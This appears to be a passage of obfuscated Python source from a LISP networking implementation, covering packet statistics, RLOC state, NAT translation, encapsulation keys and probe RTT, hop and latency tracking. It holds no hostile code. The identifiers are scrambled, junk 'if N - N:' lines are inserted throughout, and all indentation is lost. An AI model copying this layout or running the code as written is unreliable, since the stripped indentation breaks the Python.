if 77 - 77: OoOoOO00 / I1IiiI + IiII
if 66 - 66: i11iIiiIii * OoooooooOO + iII111i / Ii1I
if 42 - 42: Ii1I / iIii1I11I1II1 / Oo0Ooo . O0 . oO0o * I1IiiI
if 21 - 21: OoooooooOO
class lisp_stats ( ) :
def __init__ ( self ) :
self . packet_count = 0
self . byte_count = 0
self . last_rate_check = 0
self . last_packet_count = 0
self . last_byte_count = 0
self . last_increment = None
if 76 - 76: i1IIi * i11iIiiIii / OOooOOo + I1Ii111
if 50 - 50: oO0o % OoOoOO00 + I1IiiI
def increment ( self , octets ) :
self . packet_count += 1
self . byte_count += octets
self . last_increment = lisp_get_timestamp ( )
if 15 - 15: II111iiii - iII111i / I1ii11iIi11i
if 81 - 81: Ii1I - i1IIi % oO0o * Oo0Ooo * OoOoOO00
def recent_packet_sec ( self ) :
if ( self . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_increment
return ( oO000o0Oo00 <= 1 )
if 79 - 79: oO0o + I1IiiI % iII111i + II111iiii % OoO0O00 % iII111i
if 46 - 46: o0oOOo0O0Ooo
def recent_packet_min ( self ) :
if ( self . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_increment
return ( oO000o0Oo00 <= 60 )
if 61 - 61: OoO0O00 . O0 + I1ii11iIi11i + OoO0O00
if 44 - 44: I11i . oO0o
def stat_colors ( self , c1 , c2 , html ) :
if ( self . recent_packet_sec ( ) ) :
return ( green_last_sec ( c1 ) , green_last_sec ( c2 ) )
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if ( self . recent_packet_min ( ) ) :
return ( green_last_min ( c1 ) , green_last_min ( c2 ) )
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
return ( c1 , c2 )
if 16 - 16: OoO0O00 / Ii1I * i11iIiiIii / o0oOOo0O0Ooo + I1Ii111
if 21 - 21: I11i % I1ii11iIi11i
def normalize ( self , count ) :
count = str ( count )
IIIIIiII1iI = len ( count )
if ( IIIIIiII1iI > 12 ) :
count = count [ 0 : - 10 ] + "." + count [ - 10 : - 7 ] + "T"
return ( count )
if 39 - 39: OoOoOO00 - I11i / i11iIiiIii . Ii1I * OoOoOO00 - II111iiii
if ( IIIIIiII1iI > 9 ) :
count = count [ 0 : - 9 ] + "." + count [ - 9 : - 7 ] + "B"
return ( count )
if 79 - 79: ooOoO0o + II111iiii . oO0o
if ( IIIIIiII1iI > 6 ) :
count = count [ 0 : - 6 ] + "." + count [ - 6 ] + "M"
return ( count )
if 27 - 27: I1ii11iIi11i % IiII - ooOoO0o + O0 * IiII
return ( count )
if 87 - 87: oO0o % OoO0O00 . iIii1I11I1II1 * ooOoO0o + oO0o + IiII
if 74 - 74: i1IIi % i1IIi + Oo0Ooo
def get_stats ( self , summary , html ) :
i1iI = self . last_rate_check
i1IiI11I = self . last_packet_count
II1IIII11 = self . last_byte_count
self . last_rate_check = lisp_get_timestamp ( )
self . last_packet_count = self . packet_count
self . last_byte_count = self . byte_count
if 13 - 13: I11i + II111iiii + I1ii11iIi11i * i11iIiiIii
O0oI1Ii1II = self . last_rate_check - i1iI
if ( O0oI1Ii1II == 0 ) :
i11ii1 = 0
I11I = 0
else :
i11ii1 = int ( ( self . packet_count - i1IiI11I ) / O0oI1Ii1II )
I11I = ( self . byte_count - II1IIII11 ) / O0oI1Ii1II
I11I = ( I11I * 8 ) / 1000000
I11I = round ( I11I , 2 )
if 3 - 3: Ii1I . O0 * II111iiii + I1ii11iIi11i
if 45 - 45: OoO0O00 / I1ii11iIi11i * ooOoO0o * OOooOOo % i11iIiiIii * iII111i
if 33 - 33: oO0o . iII111i + Oo0Ooo
if 33 - 33: ooOoO0o
if 46 - 46: OoOoOO00 / iII111i - OoO0O00 . o0oOOo0O0Ooo
I1iiI1iiiI = self . normalize ( self . packet_count )
IiIiIiiiI1 = self . normalize ( self . byte_count )
if 19 - 19: IiII . Oo0Ooo . oO0o * i11iIiiIii
if 26 - 26: OoooooooOO
if 79 - 79: I1IiiI + I1IiiI
if 45 - 45: oO0o + I1IiiI / oO0o
if 33 - 33: OoooooooOO - I1Ii111 . Oo0Ooo % OoooooooOO * ooOoO0o
if ( summary ) :
oooooooOOOOO = "<br>" if html else ""
I1iiI1iiiI , IiIiIiiiI1 = self . stat_colors ( I1iiI1iiiI , IiIiIiiiI1 , html )
OOO0oOo0ooOOO = "packet-count: {}{}byte-count: {}" . format ( I1iiI1iiiI , oooooooOOOOO , IiIiIiiiI1 )
I1i1IIiIIiIiIi = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( i11ii1 , I11I )
if 23 - 23: ooOoO0o + ooOoO0o . I11i
if ( html != "" ) : I1i1IIiIIiIiIi = lisp_span ( OOO0oOo0ooOOO , I1i1IIiIIiIiIi )
else :
o0ooO = str ( i11ii1 )
Iii11i1I1 = str ( I11I )
if ( html ) :
I1iiI1iiiI = lisp_print_cour ( I1iiI1iiiI )
o0ooO = lisp_print_cour ( o0ooO )
IiIiIiiiI1 = lisp_print_cour ( IiIiIiiiI1 )
Iii11i1I1 = lisp_print_cour ( Iii11i1I1 )
if 35 - 35: OoooooooOO / OoOoOO00 * i1IIi * OoOoOO00 % Ii1I
oooooooOOOOO = "<br>" if html else ", "
if 50 - 50: IiII - II111iiii
I1i1IIiIIiIiIi = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( I1iiI1iiiI , oooooooOOOOO , o0ooO , oooooooOOOOO , IiIiIiiiI1 , oooooooOOOOO ,
# OOooOOo
Iii11i1I1 )
if 82 - 82: I1Ii111
return ( I1i1IIiIIiIiIi )
if 78 - 78: I1Ii111 % oO0o * iIii1I11I1II1
if 1 - 1: i1IIi . iIii1I11I1II1
if 2 - 2: OOooOOo % Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
if 49 - 49: iII111i + OoOoOO00
if 33 - 33: ooOoO0o
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 19 - 19: I1Ii111 % IiII
if 94 - 94: I1Ii111 * I1ii11iIi11i * I1ii11iIi11i - o0oOOo0O0Ooo . i11iIiiIii
if 16 - 16: i1IIi
if 88 - 88: OOooOOo
class lisp_rloc ( ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . rloc_probe_latency = "?/?"
self . recent_rloc_probe_latencies = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
self . multicast_rloc_probe_list = { }
if 79 - 79: oO0o
if ( recurse == False ) : return
if 52 - 52: oO0o + OoO0O00 / OoooooooOO - iIii1I11I1II1 / iII111i - oO0o
if 68 - 68: I1IiiI - OoOoOO00 - iIii1I11I1II1 % i11iIiiIii * OoOoOO00 * OoO0O00
if 97 - 97: OoO0O00 - IiII + ooOoO0o % iIii1I11I1II1 % iII111i
if 100 - 100: IiII - Ii1I * iIii1I11I1II1 . iII111i . i1IIi % Oo0Ooo
if 11 - 11: I11i + oO0o % Ii1I
if 22 - 22: ooOoO0o
O0OoooOoo = lisp_get_default_route_next_hops ( )
if ( O0OoooOoo == [ ] or len ( O0OoooOoo ) == 1 ) : return
if 46 - 46: Oo0Ooo % i11iIiiIii * o0oOOo0O0Ooo
self . rloc_next_hop = O0OoooOoo [ 0 ]
iiI = self
for II11111Iii1I in O0OoooOoo [ 1 : : ] :
OoOO000O = lisp_rloc ( False )
OoOO000O = copy . deepcopy ( self )
OoOO000O . rloc_next_hop = II11111Iii1I
iiI . next_rloc = OoOO000O
iiI = OoOO000O
if 15 - 15: i11iIiiIii % I1ii11iIi11i - i11iIiiIii
if 68 - 68: ooOoO0o
if 53 - 53: i11iIiiIii / OoOoOO00 % o0oOOo0O0Ooo / IiII
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 88 - 88: ooOoO0o . i1IIi
if 21 - 21: OoO0O00 * I1ii11iIi11i + I1ii11iIi11i
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 36 - 36: Ii1I . OOooOOo * iIii1I11I1II1 - i1IIi
if 38 - 38: Oo0Ooo . o0oOOo0O0Ooo % oO0o / i11iIiiIii * OoO0O00 % OoOoOO00
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 18 - 18: OOooOOo
if 12 - 12: I1Ii111 % II111iiii / o0oOOo0O0Ooo - iIii1I11I1II1 + II111iiii
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 41 - 41: OOooOOo
if 8 - 8: i11iIiiIii . IiII . I1ii11iIi11i + i1IIi % I1Ii111
if 64 - 64: I1IiiI . Oo0Ooo * OoO0O00
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 87 - 87: i1IIi / OoooooooOO
if 68 - 68: I1Ii111 / iIii1I11I1II1
def print_rloc ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , i1 , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 8 - 8: ooOoO0o * IiII * OOooOOo / I1IiiI
if 40 - 40: i11iIiiIii + OoooooooOO
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oo0O0OOooO0 = self . rloc_name
if ( cour ) : oo0O0OOooO0 = lisp_print_cour ( oo0O0OOooO0 )
return ( 'rloc-name: {}' . format ( blue ( oo0O0OOooO0 , cour ) ) )
if 2 - 2: o0oOOo0O0Ooo * OoO0O00
if 88 - 88: Oo0Ooo + oO0o + iII111i
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
Oo0O00O = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 51 - 51: i1IIi + i11iIiiIii * I11i / iII111i + OoooooooOO
if 89 - 89: i11iIiiIii - I1Ii111 - O0 % iIii1I11I1II1 / IiII - O0
if 63 - 63: OOooOOo
if 23 - 23: Oo0Ooo / i1IIi - OOooOOo / Oo0Ooo
I1IIiIIIii = self . rloc
if ( I1IIiIIIii . is_null ( ) == False ) :
IIiiiiII = lisp_get_nat_info ( I1IIiIIIii , self . rloc_name )
if ( IIiiiiII ) :
Oo0O00O = IIiiiiII . port
O00O0oo0O0OOo = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
oo0o00OO = I1IIiIIIii . print_address_no_iid ( )
o0oooOoOoOo = red ( oo0o00OO , False )
IiIIiiI1iI1iI = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 71 - 71: OoooooooOO - IiII . I1ii11iIi11i + OoooooooOO
if 97 - 97: Ii1I - I1IiiI . OoooooooOO * IiII
if 17 - 17: OoO0O00 / II111iiii / II111iiii / II111iiii
if 70 - 70: OoO0O00 + O0 * OoO0O00
if 25 - 25: OoooooooOO . Oo0Ooo + OOooOOo + Oo0Ooo * O0 % i1IIi
if 71 - 71: II111iiii / Ii1I + i1IIi - OoOoOO00 + Ii1I
if ( IIiiiiII . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( o0oooOoOoOo , Oo0O00O , IiIIiiI1iI1iI ) )
if 31 - 31: OoooooooOO * Ii1I - iII111i . oO0o % Ii1I
if 97 - 97: Ii1I
IIiiiiII = None if ( IIiiiiII == O00O0oo0O0OOo ) else O00O0oo0O0OOo
if ( IIiiiiII and IIiiiiII . timed_out ( ) ) :
Oo0O00O = IIiiiiII . port
o0oooOoOoOo = red ( IIiiiiII . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( o0oooOoOoOo , Oo0O00O ,
# iIii1I11I1II1 + I11i / iII111i - OoOoOO00
IiIIiiI1iI1iI ) )
IIiiiiII = None
if 61 - 61: ooOoO0o / O0 * IiII / OoO0O00
if 56 - 56: OoO0O00 + O0
if 2 - 2: OoOoOO00 - iIii1I11I1II1 * I1Ii111 % II111iiii - Oo0Ooo . OoooooooOO
if 47 - 47: I1Ii111 + oO0o - Ii1I % OoO0O00 - I1Ii111 / i11iIiiIii
if 27 - 27: i11iIiiIii . OoO0O00 + Ii1I
if 47 - 47: I1Ii111 . iIii1I11I1II1 + i11iIiiIii
if 75 - 75: iIii1I11I1II1 / OoO0O00 * OOooOOo % O0
if ( IIiiiiII ) :
if ( IIiiiiII . address != oo0o00OO ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( o0oooOoOoOo , red ( IIiiiiII . address , False ) ) )
if 82 - 82: Oo0Ooo / i1IIi . i1IIi / oO0o
self . rloc . store_address ( IIiiiiII . address )
if 7 - 7: Oo0Ooo . iII111i % I1ii11iIi11i / iII111i
o0oooOoOoOo = red ( IIiiiiII . address , False )
Oo0O00O = IIiiiiII . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( o0oooOoOoOo , Oo0O00O , IiIIiiI1iI1iI ) )
if 93 - 93: iII111i
self . store_translated_rloc ( I1IIiIIIii , Oo0O00O )
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
if 32 - 32: II111iiii
if 58 - 58: I1IiiI - o0oOOo0O0Ooo - I1Ii111 . O0 % OoO0O00 . I11i
if 41 - 41: iII111i . I1Ii111 - IiII / O0
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
if 25 - 25: Oo0Ooo * oO0o
if 78 - 78: OoOoOO00 / II111iiii
self . rle = rloc_record . rle
if ( self . rle ) :
for Iii in self . rle . rle_nodes :
oo0O0OOooO0 = Iii . rloc_name
IIiiiiII = lisp_get_nat_info ( Iii . address , oo0O0OOooO0 )
if ( IIiiiiII == None ) : continue
if 6 - 6: I1Ii111 . OoOoOO00
Oo0O00O = IIiiiiII . port
Ooooo = oo0O0OOooO0
if ( Ooooo ) : Ooooo = blue ( oo0O0OOooO0 , False )
if 75 - 75: Oo0Ooo + I11i
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( Oo0O00O ,
# I1IiiI . I1ii11iIi11i + OoO0O00 . ooOoO0o . O0 / OoO0O00
Iii . address . print_address_no_iid ( ) , Ooooo ) )
Iii . translated_port = Oo0O00O
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
if 72 - 72: I1ii11iIi11i
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
if 89 - 89: Oo0Ooo % IiII
i11IIiI1II = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 47 - 47: O0
if ( rloc_record . keys != None and i11IIiI1II ) :
Oo000O000 = rloc_record . keys [ 1 ]
if ( Oo000O000 != None ) :
oo0o00OO = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( Oo0O00O )
if 93 - 93: oO0o
Oo000O000 . add_key_by_rloc ( oo0o00OO , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( oo0o00OO , False ) ) )
if 13 - 13: OoooooooOO / ooOoO0o + IiII / oO0o + oO0o
if 78 - 78: iII111i * o0oOOo0O0Ooo + OOooOOo
if 39 - 39: ooOoO0o + o0oOOo0O0Ooo + OOooOOo * OoOoOO00
return ( Oo0O00O )
if 98 - 98: iIii1I11I1II1 - oO0o
if 91 - 91: iII111i % iII111i . ooOoO0o / iII111i
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 29 - 29: OoooooooOO + i11iIiiIii
if 11 - 11: OoooooooOO % oO0o - OoO0O00
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 49 - 49: ooOoO0o + iII111i % OoooooooOO / Oo0Ooo % i1IIi
if 50 - 50: OoO0O00
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 52 - 52: o0oOOo0O0Ooo + O0
return ( True )
if 13 - 13: OoO0O00
if 56 - 56: OoOoOO00 . ooOoO0o * oO0o - I11i
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 47 - 47: oO0o . i1IIi * I1ii11iIi11i % OOooOOo % IiII / Oo0Ooo
if 39 - 39: i11iIiiIii . OOooOOo + Oo0Ooo
if 92 - 92: O0 * Oo0Ooo / o0oOOo0O0Ooo % OoO0O00
def print_state_change ( self , new_state ) :
ooo0II11IiiiIiIi1 = self . print_state ( )
Iii11I111Ii11 = "{} -> {}" . format ( ooo0II11IiiiIiIi1 , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
Iii11I111Ii11 = bold ( Iii11I111Ii11 , False )
if 95 - 95: Oo0Ooo
return ( Iii11I111Ii11 )
if 74 - 74: OoooooooOO * i11iIiiIii * OoO0O00 * o0oOOo0O0Ooo
if 48 - 48: iII111i * I1ii11iIi11i * oO0o % O0 . OoO0O00
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 11 - 11: OOooOOo / o0oOOo0O0Ooo
if 98 - 98: oO0o + I11i . oO0o
def print_recent_rloc_probe_rtts ( self ) :
I1ii11 = str ( self . recent_rloc_probe_rtts )
I1ii11 = I1ii11 . replace ( "-1" , "?" )
return ( I1ii11 )
if 17 - 17: IiII * Oo0Ooo . i11iIiiIii . IiII . Oo0Ooo % IiII
if 93 - 93: II111iiii - IiII - O0 - i11iIiiIii / OOooOOo
def compute_rloc_probe_rtt ( self ) :
iiI = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
oo0O0ooo00 = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ iiI ] + oo0O0ooo00 [ 0 : - 1 ]
if 47 - 47: Oo0Ooo + oO0o % OoooooooOO
if 23 - 23: I1Ii111 / i11iIiiIii - ooOoO0o * iII111i - Ii1I . iIii1I11I1II1
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 11 - 11: I11i % OoOoOO00 * Oo0Ooo
if 48 - 48: OOooOOo
def print_recent_rloc_probe_hops ( self ) :
O0O0ooOOO = str ( self . recent_rloc_probe_hops )
return ( O0O0ooOOO )
if 90 - 90: O0 - i11iIiiIii * ooOoO0o . I1ii11iIi11i . Ii1I - OoooooooOO
if 23 - 23: o0oOOo0O0Ooo
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < LISP_RLOC_PROBE_TTL / 2 ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 88 - 88: I1Ii111 + iIii1I11I1II1 / o0oOOo0O0Ooo
if ( from_ttl < LISP_RLOC_PROBE_TTL / 2 ) :
O0Ooo0O00O = "!"
else :
O0Ooo0O00O = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 19 - 19: OOooOOo - II111iiii
if 80 - 80: Oo0Ooo % I1Ii111
iiI = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + O0Ooo0O00O
oo0O0ooo00 = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ iiI ] + oo0O0ooo00 [ 0 : - 1 ]
if 91 - 91: OoooooooOO - O0 . iII111i - II111iiii % O0 - OoooooooOO
if 94 - 94: I1IiiI % I1ii11iIi11i
def store_rloc_probe_latencies ( self , json_telemetry ) :
iiiiIIiI = lisp_decode_telemetry ( json_telemetry )
if 56 - 56: ooOoO0o
ooO00Oo = round ( float ( iiiiIIiI [ "etr-in" ] ) - float ( iiiiIIiI [ "itr-out" ] ) , 3 )
o0oOOOoOOo00 = round ( float ( iiiiIIiI [ "itr-in" ] ) - float ( iiiiIIiI [ "etr-out" ] ) , 3 )
if 75 - 75: i11iIiiIii
iiI = self . rloc_probe_latency
self . rloc_probe_latency = str ( ooO00Oo ) + "/" + str ( o0oOOOoOOo00 )
oo0O0ooo00 = self . recent_rloc_probe_latencies
self . recent_rloc_probe_latencies = [ iiI ] + oo0O0ooo00 [ 0 : - 1 ]
if 27 - 27: I11i - IiII - I1Ii111
if 90 - 90: OoO0O00 . oO0o * O0 / I11i % O0 + I1Ii111
def print_rloc_probe_latency ( self ) :
return ( self . rloc_probe_latency )
if 48 - 48: iIii1I11I1II1 . i11iIiiIii / OoooooooOO . i1IIi . o0oOOo0O0Ooo
if 84 - 84: Ii1I
def print_recent_rloc_probe_latencies ( self ) :
oO0o00000o = str ( self . recent_rloc_probe_latencies )
return ( oO0o00000o )
if 10 - 10: IiII
if 60 - 60: i1IIi + i1IIi
def process_rloc_probe_reply ( self , ts , nonce , eid , group , hc , ttl , jt ) :
I1IIiIIIii = self
while ( True ) :
if ( I1IIiIIIii . last_rloc_probe_nonce == nonce ) : break
I1IIiIIIii = I1IIiIIIii . next_rloc
if ( I1IIiIIIii == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 47 - 47: iII111i - I1Ii111 - I1Ii111 . ooOoO0o
return
if 5 - 5: i1IIi
if 47 - 47: I11i * I11i . OoOoOO00
if 68 - 68: OoooooooOO + OoOoOO00 + i11iIiiIii
if 89 - 89: Oo0Ooo + Ii1I * O0 - I1Ii111
if 33 - 33: iIii1I11I1II1 . I11i
if 63 - 63: oO0o - iII111i
I1IIiIIIii . last_rloc_probe_reply = ts
I1IIiIIIii . compute_rloc_probe_rtt ( )
I11ii = I1IIiIIIii . print_state_change ( "up" )
if ( I1IIiIIIii . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( I1IIiIIIii . rloc , True )
I1IIiIIIii . state = LISP_RLOC_UP_STATE
I1IIiIIIii . last_state_change = lisp_get_timestamp ( )
o0o000Oo = lisp_map_cache . lookup_cache ( eid , True )
if ( o0o000Oo ) : lisp_write_ipc_map_cache ( True , o0o000Oo )
if 18 - 18: ooOoO0o - I1Ii111 % o0oOOo0O0Ooo . iII111i . OoO0O00
if 100 - 100: II111iiii - O0 / oO0o - I11i % OOooOOo + Oo0Ooo
if 2 - 2: iII111i % OoOoOO00 + OoOoOO00 + o0oOOo0O0Ooo / ooOoO0o
if 12 - 12: i1IIi + II111iiii / o0oOOo0O0Ooo
if 81 - 81: I1Ii111 . Ii1I * ooOoO0o . IiII - OoOoOO00
I1IIiIIIii . store_rloc_probe_hops ( hc , ttl )
if 79 - 79: ooOoO0o - O0
if 56 - 56: ooOoO0o
if 89 - 89: O0 % iIii1I11I1II1 / OoOoOO00 - I1Ii111 - I1IiiI
if 60 - 60: IiII % i11iIiiIii / OOooOOo
if ( jt ) : I1IIiIIIii . store_rloc_probe_latencies ( jt )
if 43 - 43: i11iIiiIii * II111iiii + ooOoO0o - OoooooooOO * II111iiii / OoO0O00
oO0oo000O = bold ( "RLOC-probe reply" , False )
oo0o00OO = I1IIiIIIii . rloc . print_address_no_iid ( )
oo0000OoO = bold ( str ( I1IIiIIIii . print_rloc_probe_rtt ( ) ) , False )
oo00ooOOOo0O = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 78 - 78: o0oOOo0O0Ooo / i1IIi - I11i
II11111Iii1I = ""
if ( I1IIiIIIii . rloc_next_hop != None ) :
OooOOOoOoo0O0 , o00O00oo0 = I1IIiIIIii . rloc_next_hop
II11111Iii1I = ", nh {}({})" . format ( o00O00oo0 , OooOOOoOoo0O0 )
if 94 - 94: II111iiii + OoooooooOO . i1IIi + OoO0O00 + OoOoOO00
if 52 - 52: iII111i * OoOoOO00
III1iIi111I1 = bold ( I1IIiIIIii . print_rloc_probe_latency ( ) , False )
III1iIi111I1 = ", latency {}" . format ( III1iIi111I1 ) if jt else ""
if 80 - 80: I1Ii111 / IiII * o0oOOo0O0Ooo - OoOoOO00 / iIii1I11I1II1
oOo = green ( lisp_print_eid_tuple ( eid , group ) , False )
if 38 - 38: II111iiii / I11i + IiII % OoooooooOO
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}{}" ) . format ( oO0oo000O , red ( oo0o00OO , False ) , oo00ooOOOo0O , oOo ,
# I1Ii111 * OoOoOO00
I11ii , oo0000OoO , II11111Iii1I , str ( hc ) + "/" + str ( ttl ) , III1iIi111I1 ) )
if 94 - 94: OOooOOo % I1IiiI * OoO0O00
if ( I1IIiIIIii . rloc_next_hop == None ) : return
if 52 - 52: iIii1I11I1II1 % o0oOOo0O0Ooo / i1IIi + IiII
if 95 - 95: O0
if 67 - 67: OOooOOo / I11i - I1Ii111 % i11iIiiIii
if 3 - 3: oO0o + iII111i + OOooOOo
I1IIiIIIii = None
OoOOO0 = None
while ( True ) :
I1IIiIIIii = self if I1IIiIIIii == None else I1IIiIIIii . next_rloc
if ( I1IIiIIIii == None ) : break
if ( I1IIiIIIii . up_state ( ) == False ) : continue
if ( I1IIiIIIii . rloc_probe_rtt == - 1 ) : continue
if 25 - 25: iII111i % iII111i * ooOoO0o % I1ii11iIi11i % I1Ii111
if ( OoOOO0 == None ) : OoOOO0 = I1IIiIIIii
if ( I1IIiIIIii . rloc_probe_rtt < OoOOO0 . rloc_probe_rtt ) : OoOOO0 = I1IIiIIIii
if 4 - 4: O0 % i11iIiiIii % I1Ii111 - i11iIiiIii / o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 59 - 59: i1IIi . o0oOOo0O0Ooo . IiII + iII111i * i1IIi
if ( OoOOO0 != None ) :
OooOOOoOoo0O0 , o00O00oo0 = OoOOO0 . rloc_next_hop
II11111Iii1I = bold ( "nh {}({})" . format ( o00O00oo0 , OooOOOoOoo0O0 ) , False )
lprint ( " Install host-route via best {}" . format ( II11111Iii1I ) )
lisp_install_host_route ( oo0o00OO , None , False )
lisp_install_host_route ( oo0o00OO , o00O00oo0 , True )
if 41 - 41: ooOoO0o - i1IIi * IiII . OoOoOO00 % iIii1I11I1II1 - IiII
if 12 - 12: I1ii11iIi11i * iII111i / i11iIiiIii / OoOoOO00
if 62 - 62: O0 - IiII + I1ii11iIi11i
def add_to_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
Oo0O00O = self . translated_port
if ( Oo0O00O != 0 ) : oo0o00OO += ":" + str ( Oo0O00O )
if 67 - 67: i1IIi + i11iIiiIii * I1ii11iIi11i / ooOoO0o * OoO0O00
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) :
lisp_rloc_probe_list [ oo0o00OO ] = [ ]
if 52 - 52: II111iiii / Ii1I - iII111i
if 33 - 33: I1IiiI
if ( group . is_null ( ) ) : group . instance_id = 0
